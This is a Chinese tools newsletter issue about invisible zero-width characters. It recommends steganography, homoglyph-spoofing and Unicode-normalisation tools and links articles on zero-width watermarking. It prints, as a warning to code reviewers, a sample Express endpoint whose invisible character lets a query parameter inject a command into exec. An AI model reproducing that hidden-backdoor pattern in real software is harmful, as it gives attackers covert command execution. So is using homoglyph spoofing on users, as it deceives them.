发现并分享有趣,有创意,免费、好用的工具,每周四发布。由 BestXTools 创作。
上一期内容 | 下一期内容 | 往期内容 | RSS 订阅 | 邮箱订阅 | 微信订阅 | 工具推荐 | 评论
时间过得很快,好工具周刊已经更新到第 10 期了。从第 1 期更新到现在经过了两个多月,一共分享了 70 个工具(每期 7 个)。截止发稿时间,竹白平台的订阅者已有 747 人, GitHub 上面获得 61 个 stars。RSS 订阅数具体不知道有多少,从服务器日志看,看起来还挺多。在网站直接阅读的量也不少。没有做很多的的宣传,目前这个成绩还是很满意的。
开始做这个周刊,是因为平时经常看到有趣或很实用的工具,觉得只是放到收藏夹里,实在太可惜了。如果把它们分享出来,既能帮到别人,还能促使自己寻找更多好玩的工具,还可以从中获得更多的启发。如果能得到其他读者朋友们的投稿,社区会员们的参与讨论,还会发现更多好玩的工具。怀着对这个美好的良性循环的希望,决定开始这个旅程,坚持把这个周刊做下去,看看都会发生什么事情,发现什么东西。
起初,也考虑过做成博客或工具导航的形式。但是觉得这些形式可能会无法坚持做到定期定量地输出。周刊这种形式就不同了,它与读者们约定了每周四更新,每期推荐 7 个工具,这就能保证会做到定期定量地输出。每期为什么推荐 7 个工具呢?如果是 5 个以下,内容太少,如果是 10 个以上,读者们可能没有耐心全看完。很喜欢 “7” 这个数字,数量也刚刚好,不多不少,一周 7 天,每天 1 个。每期找 7 个工具,压力也不是很大。一年积累下来,也有 365 个工具了,收获不少了。
目前周刊同时发布在 3 个平台,GitHub, BestXTools 社区,竹白 newsletter。
- GitHub: 可以通过 watch 方式订阅。选择这个平台,第一是因为对内容修改历史记录的需要,第二是因为采用 Markdown 写稿,第三是因为周刊的主要对象是程序员,所以把这个周刊的 repo 设置为公开的,让大家可以用 watch 方式订阅,或 star 收藏。
- 竹白 newsletter: 可以通过邮箱,微信小程序订阅。选择这个平台的主要原因是它提供邮箱,微信小程序订阅的功能。
- BestXTools 社区: 可以通过 RSS 订阅。这是一个 Flarum 搭建的轻社区。周刊发布在这上面,是因为上面两个平台对 RSS 和评论功能的缺失。还有一点很重要,就是希望为读者们提供一个分享工具,寻找工具的交流平台。
周刊每期推荐的 7 个工具,都是免费,无需注册,好用的在线工具。其他类型的工具,比如,桌面应用,手机应用,小程序,浏览器插件等,暂时还没有精力放进周刊里,以后再说。这种类型的工具大家可以在 BestXTools 社区分享讨论。
关于周刊的思考就写到这里,希望大家继续关注,支持《好工具周刊》。
由于是特别篇,本期推荐的工具与文章跟以往不同,来一个针对特定主题的推荐。
这期的主题是“不可见零宽字符 (invisible zero-width characters)”。
一个使用不可见零宽字符实现的在线信息隐写器。可以把私密的文字隐藏起来,分享给别人或评论里。
比如下面这段文字, 复制到 https://neatnik.net/steganographr/ 解密。
欢迎订阅好工具周刊。
链接: https://neatnik.net/steganographr/
源码: https://github.com/neatnik/steganographr
与上面 Steganographr 类似的信息隐写工具。支持把二进制文件隐写到信息里。
链接: https://330k.github.io/misc_tools/unicode_steganography.html
备用链接:
源码: https://github.com/330k/misc_tools
国内开发者开发的与上面两款类似的信息隐写工具。可以指定加密信息隐藏在文字窜的哪个位置。
源码: https://github.com/rover95/morse-encrypt
一个极其简单的工具,只有一个按钮,点击按钮会复制一个零宽空格到剪切板里。把网站放到收藏夹里,想要输入一个零宽空格时会用得着。
链接: https://zerowidthspace.me/
零宽短网址生成工具。生成的“短”网址居然只能看到域名。
比如这个链接(https://zws.im/),点击看看会去哪里。
链接: https://zws.im/
源码: https://github.com/zws-im/zws
利用这个工具,可以将字母,标点符号,空格替换(伪造)为其他 Unicode 同形文字。还可以在每个字符后面自动加上零宽空格。肉眼很难识别出来。
比如这两行字符串,其实不一样,能区分出来吗?
好工具周刊 BestXTool.com
好工具周刊 ВеѕtХТооl․соm
这里的 ВеѕХТос․ 都不是常规的英文字母和句号。
这个工具的用途发挥自己的想象力吧。
链接: https://onlineunicodetools.com/spoof-unicode-text
这个工具可以把 fancy Unicode 文字转成一般文字。 比如把 "𝔹𝕖𝕤𝕥𝕏𝕋𝕠𝕠𝕝𝕤.𝕔𝕠𝕞", "ⒷⓔⓢⓣⓍⓉⓞⓞⓛⓢ.ⓒⓞⓜ" 等转成 "BestXTools.com"。
这个工具还可以把上一个工具伪造的文字,还原成一般文字,把零宽字符识别出来,替换成 ' 符号。
链接: https://onlineunicodetools.com/normalize-unicode-text
🧰 在线工具箱大全
很多程序员都喜欢做一个工具箱。平时也会经常用到各种工具。这里收集了一些国内外好用的在线工具箱。
链接:
-
The Invisible JavaScript Backdoor - Certitude Blog
使用不可见零宽字符或同形字符(易混淆字符)可以写出很难发现的后门程序。了解其中的玄机,小心项目被人恶意地提交了这种代码。
下面是这篇文章的示例代码:(Code review 真的很难发现其中的问题)
const express = require("express");
const util = require("util");
const exec = util.promisify(require("child_process").exec);
const app = express();
app.get("/network_health", async (req, res) => {
const { timeout,ㅤ} = req.query;
const checkCommands = [
"ping -c 1 google.com",
"curl -s http://example.com/",ㅤ
];
try {
await Promise.all(
checkCommands.map(
(cmd) => cmd && exec(cmd, { timeout: +timeout || 5_000 })
)
);
res.status(200);
res.send("ok");
} catch (e) {
res.status(500);
res.send("failed");
}
});
app.listen(8080);
-
Be careful what you copy: Invisibly inserting usernames into text with Zero-Width Characters
译文: 小心你复制的内容:使用零宽字符将用户名不可见的插入文本中
公司内部文件需要登录后才能访问,页面内容或下载的文件根据登录者 id 插入独一的零宽字符水印,如果内容泄漏,只需要检查泄漏文字中的零宽字符水印,就能知道是谁泄密。
你也可以在自己的博客文章里隐藏零宽字符水印,当遇到被抄袭,也许会有用。
如果你有什么好玩的工具,可以是你做的或知道的,欢迎推荐。
要求:
- 在线工具
- 免费
- 无需注册
推荐方式:
以上,便是本期全部内容。感谢你阅读到这里,下期见!
好工具周刊同时发布到三个平台,订阅方式提供多种选择。
欢迎交流,投稿,订阅。
上一期内容 | 下一期内容 | 往期内容 | RSS 订阅 | 邮箱订阅 | 微信订阅 | 工具推荐 | 评论